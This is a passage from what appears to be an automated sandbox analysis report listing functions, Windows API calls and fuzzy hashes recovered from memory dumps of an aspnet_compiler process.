                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Function 00A8FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 47 a8fdc0-a8fdd5 LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 29 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                              • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                              • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                              • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8
                                                              Function 0042C0A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 24 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                              • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                              • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                              • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8
                                                              Function 0042C123 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 39 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNELBASE(?), ref: 0042C157
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                              • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                              • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                              • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                              Non-executed Functions

                                                              Function 00A80080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [Pj
                                                              • API String ID: 0-2289356113
                                                              • Opcode ID: 3c71c6ebc8fc35eba7bf5bc2b6999061fee27adc4890d06ca14f7bff5af1b8b5
                                                              • Instruction ID: 87b1b5b896c9cb29df4c470de7b2d61d9a1f8611c0cb42cb10b0bdb29a8856dd
                                                              • Opcode Fuzzy Hash: 3c71c6ebc8fc35eba7bf5bc2b6999061fee27adc4890d06ca14f7bff5af1b8b5
                                                              • Instruction Fuzzy Hash: 62F0F631204304BBDB21FB20CC85F2A7BB5BF41714F108858F8852A093C772C825D721
                                                              Function 00AA26F8 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction ID: 00fbdf996bbf5d472b246497b7f89a30198a6a1df8a309d190dc9c064492b6ec
                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                              • Instruction Fuzzy Hash: 81F02230724049ABDB09EB1C9E61B6A73E6EB95300F54C038ED4DCB291E735DE508390
                                                              Function 00AE0101 Relevance: .0, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                              • Instruction ID: 79945d998fc6bd5e87eab6b74abaa4d3faa46a95d1959253a48758e56e31ce49
                                                              • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                              • Instruction Fuzzy Hash: 13F082722402859FCB1CCF0AC4A0FB937B2AB80755F24412CE50B8F690D7799881DA54
                                                              Function 00A800EA Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7c215c2c8ebee9081c70fb3431bcc38fc25c3d80f4f4fab9d0a0d8b0c32fe2b
                                                              • Instruction ID: 3748aa1d6ae5311e4f7e7ad55cf50050409d7643f9ba1a6189c2d7c5b9565b4d
                                                              • Opcode Fuzzy Hash: a7c215c2c8ebee9081c70fb3431bcc38fc25c3d80f4f4fab9d0a0d8b0c32fe2b
                                                              • Instruction Fuzzy Hash: 40E0E572544A818FD351EF149A01B1AB2F4FB88B20F25493AE40A97B50D7689A098A52
                                                              Function 00A900C4 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Function 00A90060 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                              Function 00A90078 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                              Function 00A90048 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                              Function 00A901D4 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                              Function 00A9010C Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                              Function 00A90C40 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                              Function 00A910D0 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                              Function 00A91148 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                              Function 00A8F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
